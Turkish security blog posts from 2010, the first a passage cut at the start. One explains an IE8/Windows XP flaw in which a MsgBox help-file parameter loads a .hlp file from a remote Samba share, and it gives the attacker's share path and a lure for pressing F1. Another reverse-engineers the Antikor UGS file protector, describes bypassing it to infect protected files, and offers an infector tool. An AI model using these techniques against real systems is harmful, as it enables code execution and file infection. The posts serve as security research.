Çünkü exploit edilebilmesi için ilgili sayfada F1 tuşuna basmanız gerekiyor, buda exploit edilmesini zorlaştırıyor. Tabi iyi düşünülmüş sosyal mesajlar ile bu tuşa basılması tetiklenebilir (Orn: Videoyu izlemek için F1 tuşuna basınız!).

Açığı tetikleyen JavaScript kütüphanesindeki MsgBox fonksyonu, bu fonksyonun syntax'ına bakalım:
MsgBox (Message, Style, Title, HelpFile)
Fonksyon çalışıtığında F1 (HELP) tuşuna başılınca, HelpFile da belirtilen dosya, ilk önce local file sistemde, yoksa yerel ağda aranıyor ve çalıştırılıyor.

Bunu internet üzerinde exploit edebilmek için , yazar, Samba serverda public share açmış ve yolu şu şekilde yazmıs:
"\\184.73.14.110\PUBLIC\test.hlp"

test.hlp dosyası da görüntülendiğinde hesap makinasını çalıştırıyor. Tabi hesap makinası yerine zararlı bir exe de olabilirdi. (Hatırlatma: .hlp dosyaları çalıştırılabilir risk sınıfı uzantılara giriyor)

Tüm yamaları yapılmış XP SP3 ve IE8 ile exploitin çalıştığını teyid ettik. (Test etmek için tıklayın)
Peki Vista ve Windows7 neden etkilenmedi onlardada IE8 var?
Çünkü Microsoft , Vista ve ilerki sürümlerde, risk taşıdığı için .hlp formatını ve winhlp32.exe componentini devre dışı bıraktı.
Bu ataktan korunmak için, bu yazıyı okumuş olmanız yeterli sanırsam (Yama gelene kadar Webde gezinirken F1 tuşuna basmayın!!! )

Zemana V8 Supercars on Clipsal 500

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Tue, 02 Mar 2010 11:00:00 +0000

Her sene Avustralya da düzenlenen ve dünyaca ilgi gören Clipsal 500 yarışmasında, 2 tane V8 Supercar Ford marka araba, Zemana Australia logoları ile dizayn edilecek. Assağıdaki resimde maket resimlerini görebilirsiniz. Yarışlar 10-14 mart arası olacak, Avustralya da bulunan okurlarımız varsa bize email atın , ilk 3 email atana Gold Zone tirubununden bilet hediye. Arabalar şu anda giydiriliyor ve piste çıktıklarında gerçek resimlerini sizlerle paylaşacağız.

Antikor UGS Research (Part1)

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Mon, 01 Mar 2010 16:26:00 +0000

Türk menşeili ve kendi alanında bir ilk olan Antikor UGS'yi mercek altına aldım.
Program hakkında tubitakta bulunan dokumanı buradan okuyabilirsiniz
Programın yazılış amacı, PE dosyalarına infect olan virüslerden korunmak. (Örnek Win32/Parite)

Bunu yapabilmek için program ilk çalıştığında sistemdeki uygulamaları tarıyor ve uygun gördüğü PE dosyalarının içine özel bir kod yerleştiriyor

Bu kod çalıştığında dosyanın infekte olup olmadığına bakıyor ve infekte ise kendi kendini temizliyor.

Programda kullanılan mantık güzel ancak bence bu program sadece bir ar-ge projesi olabilir çünkü bu program koruma amaçlıda olsa, uygulamalarınızı ve sistem dosyalarının yapısını ve varsa üzerlerindeki dijital imzayı bozacak. Ardından sistem çökmeleri vs gelecek. Ve ayrıca artık Win32/Parite gibi sistem dosyalarına bulaşan PE infector virüsleri kalmadı denebilir.

PE infector yazacak kadar ileri virüs yazarları , sanal korsanlar için çalışır oldu ve sanal korsanlarda bu kişilere spyware/spam-bots gibi yazılımlar yazdırıyorlar ve yayılma biçimi olarak ta P2P,email,MS açıkları,sosyal ağlar gibi yöntemler kullanıyorlar.

Eskiden virüs yazarları arasında, PE dosyalarını infect etmek, hele hele polymorphic olarak infect etmek bir yarış halini almıştı ancak şu anda PE protokolu ile ilgili full dokümantasyon ve örnek kodlar okadar fazlalaştı ki artık bunu yapmak çok kolay oldu.

Geçtiğimiz senin trendleri rootkitler oldu roustock,TLS gibi dosya sistemi üzerindeki en alt seviyedeki DISK I/O driver infeksyonları ile nerdeyse görünmez oldular. (driver dosyalarida PE tipidir ve uzantıları .sys 'dir)

Bu virüsler bütün Antivirüs firmalarının korkulu rüyası oldu hatta Kaspersky, bu gibi infeksyonların önüne geçmek için donanım tabanlı antivirüs patenti bile aldı :)

Sonuç olarak bu program hernekadar, teknolojisi ile ses getirmiş olsada günümüzün tehditlerine karşı bir çözüm getiremez diye düşünüyorum ve burada bir marketing segment olduğunu sanmıyorum. (Tabi bu tamamen benim fikrim)

Aslında Türkiyede çok fazla yetenek var ancak herkes tekbaşına birşeyler yapmaya çalışıyor ve Yurtdışı ile yarışabilecek yada Türkiye'ye döviz getirebilecek bir ürün çıkmıyor. Bu kişiler hep beraber aynı çatıda iyi bir organisayon ile birşey yaparsa ses getirir diye düşünüyorum. Böyle bir organisazyonuda doctus.org'un yapabileceği kanaatındayım. ( Üyeleri okuyorsa, yönetime baskı yapın :) )

Antikor UGS çalışma mantığı:
Hedef dosyada antjn01 adlı bir seçtion oluşturuluyor ve buraya orjinal dosyaya ait alttaki kısımların bir kopyası konuluyor.

PIMAGE_DOS_HEADER
PIMAGE_NT_HEADERS
IAT
OEP

ve ardından ilgili section, bir dizi XOR,ROR ve ROL işlemi ile tek taraflı encrypt ediliyor.

Arkasından OEP aynı offsette kalacak şekilde değiştiriliyor, bu yeni OEP çalıştığında, antikor seçtion'nını decrypt ediyor ve kontrolü oraya bırakıyor , antjn01 içindeki Antikor kodu çalıştığında ise dosyanın infect olup olmadığına bakıyor ve infect olmuşsa, antjn01 seçtionnına daha önceden konulmuş olan orjinal değerler ile dosyayı onarıyor.

Takım şefimizin ve ARF teknolojinin benden istediği Antikor ile korunan bir dosyayi infecte etmek. Yani virüs yazarını simüle etmek.

Ring0'da dahil olmak üzere çeşitli deobfuscator/packer teknikleri için static unpacker yazan bir kişi olduğum için bu benim için çok kolay oldu. PE infector virüsü yazan kişiler içinde Antikor'u bu sürümünde bypass etmek çok zor olmaz.

Antikor ile patch edilmiş bir dosyayı ollydbg'a yüklediğimde alttaki şekilde bir OEP ile karşılaştim. Encrypt loop'u kırmızı içine aldım.

Program bir uygulamaya uygulandığında herseferinde random bir xor key üretiyor. Bu nedenle antjn01 secion, her uygulamada farklı oluyor, bu yüzden ilk önce kullanılan xor key'i bulmak arkasından alttaki fonksyon ile section'i decrypt etmek gerekiyor.

Decrypt ettikten sonra orjinal OEP'i, antjn01 içinden alıp eski yerine yazıyoruz. Arkasından antjn01 seçtionu silip PE header'i fix ediyoruz ve kaydediyoruz. Artık dosya eski haline dondu.

Bu anlattığım yöntemler ile, Antikorla korunan dosyaları orjinal haline getirebilecek hatta infecte edebilecek bir uygulama yazdım buradan indirebilirsiniz.

Test etmek içinde burdan , Robert Kuster yazdigi WinSpy programının antikor işlemine tutulmuş halini indirebilirsiniz.

Infecte dediğim, uygulamaya basit bir messagebox ekliyor amaç infect olabildiğini göstermek yoksa gerçek infeksyon rütünleri yok tabi!!!

NOT: Testlerimi, programın kendi sayfasındaki son indirilebilir sürüm üzerinde yaptım (1.0.0.2). Eski sürümlerinde yada daha sonra çıkacak sürümleri üzerinde çalışmayabilir.

Antikor uygulamasını bypass edene 500TL ödül veriliyor, bende bunu almıs oluyorum :)
Ve bu parayı, benim yazdığım infector ile, infect edilen dosyayı temizleyebilecek bir araç yapana veriyorum.

Elinizi çabuk tutun, nitekim ARF teknoloji sizden önce cleaner yaparsa para bana gelmeden orada kalır :)

Kural: Cleaner, static olmalı, yani dosyayı çalıştırmadan temizleme yapmalı, eğer dynamic olarak yaparsanız ödülün yarısı 250TL. OllyScript vb ile yaparsanız, Intel Press'ten istediğiniz bir kitap hediye!

Not: Dosyanın içinde MessageBoxA çağrısını patch etmeyi çözüm olarak kabul etmem, program tam eski haline gelmese bile en azından IAT ve OEP düzeltilmelidir çünkü burdaki mesaj box sembolik, amaç infectionu temizlemek.

UPDATE (1:16 PM 4/6/2010): Unpacker yarışması için uğraşan varsa artık sadece dynamic yada OllyScript çözümü ile uğraşması gerekmekte çünkü static unpacker çözümü bulundu. (Bloğumuzun iyi bir takipçisi ve aynı zamanada yarışmalarımızda her zaman doğru çözümler üreten civil engineer, bu defada çözümü buldu ve en büyük ödülün sahibi oldu çünkü çözüm yolu static, tekrar tebrikler civil engineer! )

UPDATE (8:07 PM 4/6/2010): Dynamic ve OllyScript çözümleride geldi. Yarışmada 750TL + Kitap hediye vermiş bulunuyoruz. Yarışmaya katılan herkeze teşekkür ederiz. (Yarışmanın 2. ve 3. aşamalarını FunyBoy tamamladı, tebrikler! )